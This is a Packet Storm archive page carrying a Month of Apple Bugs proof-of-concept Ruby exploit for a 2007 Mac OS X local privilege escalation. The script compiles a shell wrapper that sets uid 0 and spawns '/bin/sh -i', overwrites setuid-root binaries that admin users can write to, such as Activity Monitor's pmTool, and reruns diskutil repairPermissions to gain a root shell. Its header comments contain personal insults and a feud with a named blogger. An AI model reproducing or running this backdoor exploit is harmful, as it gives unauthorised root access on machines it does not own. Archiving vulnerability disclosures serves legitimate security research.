what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MOAB-15-01-2007.rb.txt

MOAB-15-01-2007.rb.txt
Posted Jan 20, 2007
Authored by LMH | Site projects.info-pull.com

Month of Apple Bugs - Proof of concept exploit for a local privilege escalation vulnerability on Mac OS X. Multiple binaries inside the /Applications directory tree are setuid root, but remain writable by users in the admin group (ex. first user by default in a non-server Mac OS X installation), allowing privilege escalation.

tags | exploit, local, root, proof of concept
systems | apple, osx
SHA-256 | 5d79f7e869386b86fb511af90c48ec4794090cc26d9550ab41fb92e9be07807c

MOAB-15-01-2007.rb.txt

Change Mirror Download
# !/usr/bin/ruby
# Exploit for MOAB-15-01-2007
# (c) 2006 LMH <lmh [at] info-pull.com>.
#
# Note: It's a generic exploit, you can use it over any binary writable which
# is set as root setuid by diskutil repair permissions. Simply change the path.
# Blame Apple for doing such a piece of **** and relying on flawed DAC.
#
# Line-noise: Jackass of the Week
# -------
# On Jan 14, 11:10 pm, "William A. Carrel" <willia...@carrel.org> wrote:
# > Works for me. I see yesterday's was an HFS+ panic.
# > > Is the info-pull/MoAB/MoKB site down, or is it just me that can't
# > > access it?
# Sorry, my fault. I blocked access to it at this end when they started
# distributing malware so that nobody downloaded anything accidentally. I
# can see it again now.
#
# Kind regards,
#
# Alastair.
# --------
#
# Hmm, false, it was the other way around:
#
# target prot opt source destination
# (...)
# DROP all -- ajhoughton.plus.com anywhere
# (...)
#
# "LMH’s continued propensity for insults, which frankly I don’t particularly
# appreciate." -- http://alastairs-place.net/2007/01/how-childish/
#
# There's nothing wrong about embarrassing you for being an absurd liar.
# Live with it, and then post to your 'blog' as usual. Free Zealot Apple PR (tm).
#

require 'fileutils'

DISK_UTIL_COMMAND = "/usr/sbin/diskutil repairPermissions /"
AVAILABLE_TARGETS = [
"/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool",
"/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy",
"/Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool"
]

path_to_bin = (AVAILABLE_TARGETS[ARGV[0].to_i] || AVAILABLE_TARGETS[0])
path_to_back = File.join("/tmp", File.basename(path_to_bin))

puts "++ Starting: #{path_to_bin}"
puts "++ Back-up: #{path_to_back}"

if File.exists?(path_to_bin)
unless File.exists?(path_to_back)
FileUtils.cp(path_to_bin, path_to_back)
end
end

puts "++ Compiling a shell wrapper at /tmp/o..."
WRAP_CODE = 'int main() { setuid(0); setgid(0); seteuid(0); system("/bin/sh -i"); }'
COMPILE = "echo '#{WRAP_CODE}' > /tmp/t.c && gcc /tmp/t.c -s -o /tmp/o && rm -rf /tmp/t.c"
system(COMPILE)

puts "++ Placing backdoor..."
FileUtils.mv("/tmp/o", path_to_bin)
system(DISK_UTIL_COMMAND)

puts "++ Finished. Backup at #{path_to_back}."
puts "++ Repair with: mv '#{path_to_back}' '#{path_to_bin}'"
puts "++ Enjoy root shell."
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close